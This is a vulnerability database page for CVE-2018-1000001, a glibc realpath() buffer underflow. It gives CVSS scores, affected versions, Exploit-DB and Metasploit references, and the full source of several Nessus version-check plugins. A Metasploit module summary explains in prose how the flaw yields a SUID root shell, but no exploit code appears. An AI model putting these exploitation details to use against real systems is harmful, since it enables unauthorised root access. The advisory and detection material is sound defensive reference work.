Vulnerabilities > CVE-2018-1000001 - Out-of-bounds Write vulnerability in multiple products

CVSS 7.2 - HIGH

Attack vector

LOCAL

Attack complexity

LOW

Privileges required

NONE

Confidentiality impact

COMPLETE

Integrity impact

COMPLETE

Availability impact

COMPLETE

local

low complexity

nessus

exploit available

metasploit

NVD

Published: 2018-01-31

Updated: 2019-10-03

Summary

In glibc 2.26 and earlier there is confusion in the usage of getcwd() by realpath() which can be used to write before the destination buffer leading to a buffer underflow and potential code execution.

Vulnerable Configurations

Part	Description	Count
Application	Gnu GNU Glibc - GNU Glibc 0.1 GNU Glibc 0.4 GNU Glibc 0.4.1 GNU Glibc 0.5 GNU Glibc 0.6 GNU Glibc 1.00 GNU Glibc 1.01 GNU Glibc 1.02 GNU Glibc 1.03 GNU Glibc 1.04 GNU Glibc 1.05 GNU Glibc 1.06 GNU Glibc 1.06.1 GNU Glibc 1.06.2 GNU Glibc 1.06.3 GNU Glibc 1.06.4 GNU Glibc 1.06.6 GNU Glibc 1.06.7 GNU Glibc 1.06.8 GNU Glibc 1.06.9 GNU Glibc 1.06.10 GNU Glibc 1.06.11 GNU Glibc 1.06.12 GNU Glibc 1.06.13 GNU Glibc 1.07 GNU Glibc 1.07.1 GNU Glibc 1.07.2 GNU Glibc 1.07.3 GNU Glibc 1.07.4 GNU Glibc 1.07.5 GNU Glibc 1.07.6 GNU Glibc 1.08 GNU Glibc 1.08.1 GNU Glibc 1.08.3 GNU Glibc 1.08.4 GNU Glibc 1.08.5 GNU Glibc 1.08.6 GNU Glibc 1.08.7 GNU Glibc 1.08.8 GNU Glibc 1.08.9 GNU Glibc 1.08.10 GNU Glibc 1.08.11 GNU Glibc 1.08.12 GNU Glibc 1.08.13 GNU Glibc 1.08.14 GNU Glibc 1.09 GNU Glibc 1.09.1 GNU Glibc 1.09.2 GNU Glibc 1.09.3 GNU Glibc 1.09.5 GNU Glibc 2.0 GNU Glibc 2.0.1 GNU Glibc 2.0.2 GNU Glibc 2.0.3 GNU Glibc 2.0.4 GNU Glibc 2.0.5 GNU Glibc 2.0.6 GNU Glibc 2.1 GNU Glibc 2.1.1 GNU Glibc 2.1.1.6 GNU Glibc 2.1.2 GNU Glibc 2.1.3 GNU Glibc 2.1.3.10 GNU Glibc 2.1.9 GNU Glibc 2.2 GNU Glibc 2.2.1 GNU Glibc 2.2.2 GNU Glibc 2.2.3 GNU Glibc 2.2.4 GNU Glibc 2.2.5 GNU Glibc 2.3 GNU Glibc 2.3.1 GNU Glibc 2.3.2 GNU Glibc 2.3.3 GNU Glibc 2.3.4 GNU Glibc 2.3.5 GNU Glibc 2.3.6 GNU Glibc 2.3.10 GNU Glibc 2.4 GNU Glibc 2.5 GNU Glibc 2.5.1 GNU Glibc 2.6 GNU Glibc 2.6.1 GNU Glibc 2.7 GNU Glibc 2.8 GNU Glibc 2.9 GNU Glibc 2.10 GNU Glibc 2.10.1 GNU Glibc 2.10.2 GNU Glibc 2.11 GNU Glibc 2.11.1 GNU Glibc 2.11.2 GNU Glibc 2.11.3 GNU Glibc 2.12 GNU Glibc 2.12.0 GNU Glibc 2.12.1 GNU Glibc 2.12.2 GNU Glibc 2.13 GNU Glibc 2.14 GNU Glibc 2.14.1 GNU Glibc 2.15 GNU Glibc 2.16 GNU Glibc 2.17 GNU Glibc 2.18 GNU Glibc 2.19 GNU Glibc 2.20 GNU Glibc 2.21 GNU Glibc 2.22 GNU Glibc 2.23 GNU Glibc 2.24 GNU Glibc 2.25 GNU Glibc 2.26	120
Application	Redhat Redhat Virtualization Host 4.0	1
OS	Canonical Canonical Ubuntu Linux 12.04 Canonical Ubuntu Linux 14.04 Canonical Ubuntu Linux 16.04 Canonical Ubuntu Linux 17.10	4
OS	Redhat Redhat Enterprise Linux Desktop 7.0 Redhat Enterprise Linux Server 7.0 Redhat Enterprise Linux Server AUS 7.6 Redhat Enterprise Linux Server EUS 7.6 Redhat Enterprise Linux Server TUS 7.6 Redhat Enterprise Linux Workstation 7.0	6

Common Weakness Enumeration (CWE)

CWE-787 - Out-of-bounds Write

Exploit-Db

description	glibc - 'getcwd()' Local Privilege Escalation. CVE-2018-1000001. Local exploit for Linux platform
file	exploits/linux/local/43775.c
id	EDB-ID:43775
last seen	2018-01-24
modified	2018-01-16
platform	linux
port
published	2018-01-16
reporter	Exploit-DB
source	https://www.exploit-db.com/download/43775/
title	glibc - 'getcwd()' Local Privilege Escalation
type	local

description	glibc - 'realpath()' Privilege Escalation (Metasploit). CVE-2018-1000001. Local exploit for Linux platform. Tags: Metasploit Framework (MSF), Local
file	exploits/linux/local/44889.rb
id	EDB-ID:44889
last seen	2018-06-13
modified	2018-06-13
platform	linux
port
published	2018-06-13
reporter	Exploit-DB
source	https://www.exploit-db.com/download/44889/
title	glibc - 'realpath()' Privilege Escalation (Metasploit)
type	local

Metasploit

description	This module attempts to gain root privileges on Linux systems by abusing a vulnerability in GNU C Library (glibc) version 2.26 and prior. This module uses halfdog's RationalLove exploit to exploit a buffer underflow in glibc realpath() and create a SUID root shell. The exploit has offsets for glibc versions 2.23-0ubuntu9 and 2.24-11+deb9u1. The target system must have unprivileged user namespaces enabled. This module has been tested successfully on Ubuntu Linux 16.04.3 (x86_64) with glibc version 2.23-0ubuntu9; and Debian 9.0 (x86_64) with glibc version 2.24-11+deb9u1.
id	MSF:EXPLOIT/LINUX/LOCAL/GLIBC_REALPATH_PRIV_ESC
last seen	2020-06-14
modified	2019-01-10
published	2018-05-26
references	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000001 https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/ http://www.openwall.com/lists/oss-security/2018/01/11/5 https://securitytracker.com/id/1040162 https://sourceware.org/bugzilla/show_bug.cgi?id=22679 https://usn.ubuntu.com/3534-1/ https://bugzilla.redhat.com/show_bug.cgi?id=1533836
reporter	Rapid7
source	https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/glibc_realpath_priv_esc.rb
title	glibc 'realpath()' Privilege Escalation

Nessus

NASL family	Scientific Linux Local Security Checks
NASL id	SL_20180410_GLIBC_ON_SL7_X.NASL
description	Security Fix(es) : - glibc: realpath() buffer underflow when getcwd() returns relative path allows privilege escalation (CVE-2018-1000001) - glibc: Buffer overflow in glob with GLOB_TILDE (CVE-2017-15670) - glibc: Buffer overflow during unescaping of user names with the ~ operator (CVE-2017-15804) - glibc: denial of service in getnetbyname function (CVE-2014-9402) - glibc: DNS resolver NULL pointer dereference with crafted record type (CVE-2015-5180) - glibc: Fragmentation attacks possible when EDNS0 is enabled (CVE-2017-12132) Additional Changes :
last seen	2020-03-18
modified	2018-05-01
plugin id	109447
published	2018-05-01
reporter	This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/109447
title	Scientific Linux Security Update : glibc on SL7.x x86_64 (20180410)
code	# # (C) Tenable Network Security, Inc. # # The descriptive text is (C) Scientific Linux. # include("compat.inc"); if (description) { script_id(109447); script_version("1.5"); script_set_attribute(attribute:"plugin_modification_date", value:"2020/02/24"); script_cve_id("CVE-2014-9402", "CVE-2015-5180", "CVE-2017-12132", "CVE-2017-15670", "CVE-2017-15804", "CVE-2018-1000001"); script_name(english:"Scientific Linux Security Update : glibc on SL7.x x86_64 (20180410)"); script_summary(english:"Checks rpm output for the updated packages"); script_set_attribute( attribute:"synopsis", value: "The remote Scientific Linux host is missing one or more security updates." ); script_set_attribute( attribute:"description", value: "Security Fix(es) : - glibc: realpath() buffer underflow when getcwd() returns relative path allows privilege escalation (CVE-2018-1000001) - glibc: Buffer overflow in glob with GLOB_TILDE (CVE-2017-15670) - glibc: Buffer overflow during unescaping of user names with the ~ operator (CVE-2017-15804) - glibc: denial of service in getnetbyname function (CVE-2014-9402) - glibc: DNS resolver NULL pointer dereference with crafted record type (CVE-2015-5180) - glibc: Fragmentation attacks possible when EDNS0 is enabled (CVE-2017-12132) Additional Changes :" ); # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1804&L=scientific-linux-errata&F=&S=&P=7441 script_set_attribute( attribute:"see_also", value:"http://www.nessus.org/u?262112fc" ); script_set_attribute(attribute:"solution", value:"Update the affected packages."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C"); script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:O/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"metasploit_name", value:'glibc "realpath()" Privilege Escalation'); script_set_attribute(attribute:"exploit_framework_metasploit", value:"true"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fermilab:scientific_linux:glibc"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fermilab:scientific_linux:glibc-common"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fermilab:scientific_linux:glibc-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fermilab:scientific_linux:glibc-debuginfo-common"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fermilab:scientific_linux:glibc-devel"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fermilab:scientific_linux:glibc-headers"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fermilab:scientific_linux:glibc-static"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fermilab:scientific_linux:glibc-utils"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fermilab:scientific_linux:nscd"); script_set_attribute(attribute:"cpe", value:"x-cpe:/o:fermilab:scientific_linux"); script_set_attribute(attribute:"vuln_publication_date", value:"2015/02/24"); script_set_attribute(attribute:"patch_publication_date", value:"2018/04/10"); script_set_attribute(attribute:"plugin_publication_date", value:"2018/05/01"); script_set_attribute(attribute:"generated_plugin", value:"current"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof."); script_family(english:"Scientific Linux Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/cpu", "Host/RedHat/release", "Host/RedHat/rpm-list"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("misc_func.inc"); include("rpm.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); release = get_kb_item("Host/RedHat/release"); if (isnull(release) \|\| "Scientific Linux " >!< release) audit(AUDIT_HOST_NOT, "running Scientific Linux"); os_ver = pregmatch(pattern: "Scientific Linux.*release ([0-9]+(\.[0-9]+)?)", string:release); if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Scientific Linux"); os_ver = os_ver[1]; if (! preg(pattern:"^7([^0-9]\|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Scientific Linux 7.x", "Scientific Linux " + os_ver); if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING); cpu = get_kb_item("Host/cpu"); if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH); if (cpu >!< "x86_64" && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Scientific Linux", cpu); if ("x86_64" >!< cpu) audit(AUDIT_ARCH_NOT, "x86_64", cpu); flag = 0; if (rpm_check(release:"SL7", cpu:"x86_64", reference:"glibc-2.17-222.el7")) flag++; if (rpm_check(release:"SL7", cpu:"x86_64", reference:"glibc-common-2.17-222.el7")) flag++; if (rpm_check(release:"SL7", cpu:"x86_64", reference:"glibc-debuginfo-2.17-222.el7")) flag++; if (rpm_check(release:"SL7", cpu:"x86_64", reference:"glibc-debuginfo-common-2.17-222.el7")) flag++; if (rpm_check(release:"SL7", cpu:"x86_64", reference:"glibc-devel-2.17-222.el7")) flag++; if (rpm_check(release:"SL7", cpu:"x86_64", reference:"glibc-headers-2.17-222.el7")) flag++; if (rpm_check(release:"SL7", cpu:"x86_64", reference:"glibc-static-2.17-222.el7")) flag++; if (rpm_check(release:"SL7", cpu:"x86_64", reference:"glibc-utils-2.17-222.el7")) flag++; if (rpm_check(release:"SL7", cpu:"x86_64", reference:"nscd-2.17-222.el7")) flag++; if (flag) { security_report_v4( port : 0, severity : SECURITY_HOLE, extra : rpm_report_get() ); exit(0); } else { tested = pkg_tests_get(); if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested); else audit(AUDIT_PACKAGE_NOT_INSTALLED, "glibc / glibc-common / glibc-debuginfo / glibc-debuginfo-common / etc"); }

NASL family	SuSE Local Security Checks
NASL id	SUSE_SU-2018-0076-1.NASL
description	This update for glibc fixes the following issues : - A privilege escalation bug in the realpath() function has been fixed. [CVE-2018-1000001, bsc#1074293] - A buffer manipulation vulnerability in nscd has been fixed that could possibly have lead to an nscd daemon crash or code execution as the user running nscd. [CVE-2014-9984, bsc#1043984] Note that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
last seen	2020-06-01
modified	2020-06-02
plugin id	106046
published	2018-01-15
reporter	This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/106046
title	SUSE SLES12 Security Update : glibc (SUSE-SU-2018:0076-1)
code	# # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from SUSE update advisory SUSE-SU-2018:0076-1. # The text itself is copyright (C) SUSE. # include("compat.inc"); if (description) { script_id(106046); script_version("1.8"); script_cvs_date("Date: 2019/09/10 13:51:46"); script_cve_id("CVE-2014-9984", "CVE-2018-1000001"); script_name(english:"SUSE SLES12 Security Update : glibc (SUSE-SU-2018:0076-1)"); script_summary(english:"Checks rpm output for the updated packages."); script_set_attribute( attribute:"synopsis", value:"The remote SUSE host is missing one or more security updates." ); script_set_attribute( attribute:"description", value: "This update for glibc fixes the following issues : - A privilege escalation bug in the realpath() function has been fixed. [CVE-2018-1000001, bsc#1074293] - A buffer manipulation vulnerability in nscd has been fixed that could possibly have lead to an nscd daemon crash or code execution as the user running nscd. [CVE-2014-9984, bsc#1043984] Note that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues." ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.suse.com/show_bug.cgi?id=1043984" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.suse.com/show_bug.cgi?id=1074293" ); script_set_attribute( attribute:"see_also", value:"https://www.suse.com/security/cve/CVE-2014-9984/" ); script_set_attribute( attribute:"see_also", value:"https://www.suse.com/security/cve/CVE-2018-1000001/" ); # https://www.suse.com/support/update/announcement/2018/suse-su-20180076-1/ script_set_attribute( attribute:"see_also", value:"http://www.nessus.org/u?9b2a8e7b" ); script_set_attribute( attribute:"solution", value: "To install this SUSE Security Update use YaST online_update. Alternatively you can run the command listed for your product : SUSE Linux Enterprise Server 12-LTSS:zypper in -t patch SUSE-SLE-SERVER-12-2018-54=1 To bring your system up-to-date, use 'zypper patch'." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"); script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:O/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"metasploit_name", value:'glibc "realpath()" Privilege Escalation'); script_set_attribute(attribute:"exploit_framework_metasploit", value:"true"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:glibc"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:glibc-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:glibc-debugsource"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:glibc-devel"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:glibc-devel-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:glibc-locale"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:glibc-locale-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:glibc-profile"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:nscd"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:nscd-debuginfo"); script_set_attribute(attribute:"cpe", value:"cpe:/o:novell:suse_linux:12"); script_set_attribute(attribute:"vuln_publication_date", value:"2017/06/12"); script_set_attribute(attribute:"patch_publication_date", value:"2018/01/12"); script_set_attribute(attribute:"plugin_publication_date", value:"2018/01/15"); script_set_attribute(attribute:"generated_plugin", value:"current"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_family(english:"SuSE Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/cpu", "Host/SuSE/release", "Host/SuSE/rpm-list"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("rpm.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); release = get_kb_item("Host/SuSE/release"); if (isnull(release) \|\| release !~ "^(SLED\|SLES)") audit(AUDIT_OS_NOT, "SUSE"); os_ver = pregmatch(pattern: "^(SLE(S\|D)\d+)", string:release); if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "SUSE"); os_ver = os_ver[1]; if (! preg(pattern:"^(SLES12)$", string:os_ver)) audit(AUDIT_OS_NOT, "SUSE SLES12", "SUSE " + os_ver); if (!get_kb_item("Host/SuSE/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING); cpu = get_kb_item("Host/cpu"); if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH); if (cpu !~ "^i[3-6]86$" && "x86_64" >!< cpu && "s390x" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "SUSE " + os_ver, cpu); sp = get_kb_item("Host/SuSE/patchlevel"); if (isnull(sp)) sp = "0"; if (os_ver == "SLES12" && (! preg(pattern:"^(0)$", string:sp))) audit(AUDIT_OS_NOT, "SLES12 SP0", os_ver + " SP" + sp); flag = 0; if (rpm_check(release:"SLES12", sp:"0", reference:"glibc-2.19-22.24.5")) flag++; if (rpm_check(release:"SLES12", sp:"0", reference:"glibc-debuginfo-2.19-22.24.5")) flag++; if (rpm_check(release:"SLES12", sp:"0", reference:"glibc-debugsource-2.19-22.24.5")) flag++; if (rpm_check(release:"SLES12", sp:"0", reference:"glibc-devel-2.19-22.24.5")) flag++; if (rpm_check(release:"SLES12", sp:"0", reference:"glibc-devel-debuginfo-2.19-22.24.5")) flag++; if (rpm_check(release:"SLES12", sp:"0", reference:"glibc-locale-2.19-22.24.5")) flag++; if (rpm_check(release:"SLES12", sp:"0", reference:"glibc-locale-debuginfo-2.19-22.24.5")) flag++; if (rpm_check(release:"SLES12", sp:"0", reference:"glibc-profile-2.19-22.24.5")) flag++; if (rpm_check(release:"SLES12", sp:"0", reference:"nscd-2.19-22.24.5")) flag++; if (rpm_check(release:"SLES12", sp:"0", reference:"nscd-debuginfo-2.19-22.24.5")) flag++; if (rpm_check(release:"SLES12", sp:"0", reference:"glibc-32bit-2.19-22.24.5")) flag++; if (rpm_check(release:"SLES12", sp:"0", reference:"glibc-debuginfo-32bit-2.19-22.24.5")) flag++; if (rpm_check(release:"SLES12", sp:"0", reference:"glibc-devel-32bit-2.19-22.24.5")) flag++; if (rpm_check(release:"SLES12", sp:"0", reference:"glibc-devel-debuginfo-32bit-2.19-22.24.5")) flag++; if (rpm_check(release:"SLES12", sp:"0", reference:"glibc-locale-32bit-2.19-22.24.5")) flag++; if (rpm_check(release:"SLES12", sp:"0", reference:"glibc-locale-debuginfo-32bit-2.19-22.24.5")) flag++; if (rpm_check(release:"SLES12", sp:"0", reference:"glibc-profile-32bit-2.19-22.24.5")) flag++; if (flag) { if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get()); else security_hole(0); exit(0); } else { tested = pkg_tests_get(); if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested); else audit(AUDIT_PACKAGE_NOT_INSTALLED, "glibc"); }

NASL family	Fedora Local Security Checks
NASL id	FEDORA_2018-7714B514E2.NASL
description	This update addresses two security vulnerabilities : - CVE-2017-16997: Check for empty tokens before dynamic string token expansion in the dynamic linker, so that pre-existing privileged programs with `$ORIGIN` rpaths/runpaths do not cause the dynamic linker to search the current directory, potentially leading to privilege escalation. (RHBZ#1526866). - CVE-2018-1000001: `getcwd` would sometimes return a non-absolute path, confusing the `realpath` function, leading to privilege escalation in conjunction with user namespaces. (RHBZ#1533837) In addition, this update changes the thread stack size accounting to provide additional stack space compared to previous glibc versions. For some applications (`nptd` in particular), the `PTHREAD_STACK_MIN` stack size was too small on x86-64 machines with AVX-512 support (RHBZ#1527887). Note that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
last seen	2020-06-05
modified	2018-01-24
plugin id	106279
published	2018-01-24
reporter	This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/106279
title	Fedora 27 : glibc (2018-7714b514e2)
code	#%NASL_MIN_LEVEL 80502 # # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from Fedora Security Advisory FEDORA-2018-7714b514e2. # include("compat.inc"); if (description) { script_id(106279); script_version("3.6"); script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/04"); script_cve_id("CVE-2017-16997", "CVE-2018-1000001"); script_xref(name:"FEDORA", value:"2018-7714b514e2"); script_name(english:"Fedora 27 : glibc (2018-7714b514e2)"); script_summary(english:"Checks rpm output for the updated package."); script_set_attribute( attribute:"synopsis", value:"The remote Fedora host is missing a security update." ); script_set_attribute( attribute:"description", value: "This update addresses two security vulnerabilities : - CVE-2017-16997: Check for empty tokens before dynamic string token expansion in the dynamic linker, so that pre-existing privileged programs with `$ORIGIN` rpaths/runpaths do not cause the dynamic linker to search the current directory, potentially leading to privilege escalation. (RHBZ#1526866). - CVE-2018-1000001: `getcwd` would sometimes return a non-absolute path, confusing the `realpath` function, leading to privilege escalation in conjunction with user namespaces. (RHBZ#1533837) In addition, this update changes the thread stack size accounting to provide additional stack space compared to previous glibc versions. For some applications (`nptd` in particular), the `PTHREAD_STACK_MIN` stack size was too small on x86-64 machines with AVX-512 support (RHBZ#1527887). Note that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues." ); script_set_attribute( attribute:"see_also", value:"https://bodhi.fedoraproject.org/updates/FEDORA-2018-7714b514e2" ); script_set_attribute(attribute:"solution", value:"Update the affected glibc package."); script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C"); script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:O/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"metasploit_name", value:'glibc "realpath()" Privilege Escalation'); script_set_attribute(attribute:"exploit_framework_metasploit", value:"true"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:glibc"); script_set_attribute(attribute:"cpe", value:"cpe:/o:fedoraproject:fedora:27"); script_set_attribute(attribute:"vuln_publication_date", value:"2017/12/18"); script_set_attribute(attribute:"patch_publication_date", value:"2018/01/23"); script_set_attribute(attribute:"plugin_publication_date", value:"2018/01/24"); script_set_attribute(attribute:"generated_plugin", value:"current"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof."); script_family(english:"Fedora Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("rpm.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); release = get_kb_item("Host/RedHat/release"); if (isnull(release) \|\| "Fedora" >!< release) audit(AUDIT_OS_NOT, "Fedora"); os_ver = pregmatch(pattern: "Fedora.*release ([0-9]+)", string:release); if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Fedora"); os_ver = os_ver[1]; if (! preg(pattern:"^27([^0-9]\|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Fedora 27", "Fedora " + os_ver); if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING); cpu = get_kb_item("Host/cpu"); if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH); if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Fedora", cpu); flag = 0; if (rpm_check(release:"FC27", reference:"glibc-2.26-24.fc27")) flag++; if (flag) { security_report_v4( port : 0, severity : SECURITY_HOLE, extra : rpm_report_get() ); exit(0); } else { tested = pkg_tests_get(); if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested); else audit(AUDIT_PACKAGE_NOT_INSTALLED, "glibc"); }

NASL family	Huawei Local Security Checks
NASL id	EULEROS_SA-2018-1048.NASL
description	According to the version of the glibc packages installed, the EulerOS installation on the remote host is affected by the following vulnerability : - In glibc 2.26 and earlier there is confusion in the usage of getcwd() by realpath() which can be used to write before the destination buffer leading to a buffer underflow and potential code execution.(CVE-2018-1000001) Note that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
last seen	2020-05-06
modified	2018-02-13
plugin id	106776
published	2018-02-13
reporter	This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/106776
title	EulerOS 2.0 SP2 : glibc (EulerOS-SA-2018-1048)
code	# # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(106776); script_version("3.10"); script_set_attribute(attribute:"plugin_modification_date", value:"2020/05/04"); script_cve_id( "CVE-2018-1000001" ); script_name(english:"EulerOS 2.0 SP2 : glibc (EulerOS-SA-2018-1048)"); script_summary(english:"Checks the rpm output for the updated package."); script_set_attribute(attribute:"synopsis", value: "The remote EulerOS host is missing a security update."); script_set_attribute(attribute:"description", value: "According to the version of the glibc packages installed, the EulerOS installation on the remote host is affected by the following vulnerability : - In glibc 2.26 and earlier there is confusion in the usage of getcwd() by realpath() which can be used to write before the destination buffer leading to a buffer underflow and potential code execution.(CVE-2018-1000001) Note that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues."); # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2018-1048 script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?1343aba6"); script_set_attribute(attribute:"solution", value: "Update the affected glibc package."); script_set_cvss_base_vector("CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C"); script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:O/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"metasploit_name", value:'glibc "realpath()" Privilege Escalation'); script_set_attribute(attribute:"exploit_framework_metasploit", value:"true"); script_set_attribute(attribute:"patch_publication_date", value:"2018/02/07"); script_set_attribute(attribute:"plugin_publication_date", value:"2018/02/13"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:huawei:euleros:glibc"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:huawei:euleros:glibc-common"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:huawei:euleros:glibc-devel"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:huawei:euleros:glibc-headers"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:huawei:euleros:glibc-static"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:huawei:euleros:glibc-utils"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:huawei:euleros:nscd"); script_set_attribute(attribute:"cpe", value:"cpe:/o:huawei:euleros:2.0"); script_set_attribute(attribute:"generated_plugin", value:"current"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_family(english:"Huawei Local Security Checks"); script_copyright(english:"This script is Copyright (C) 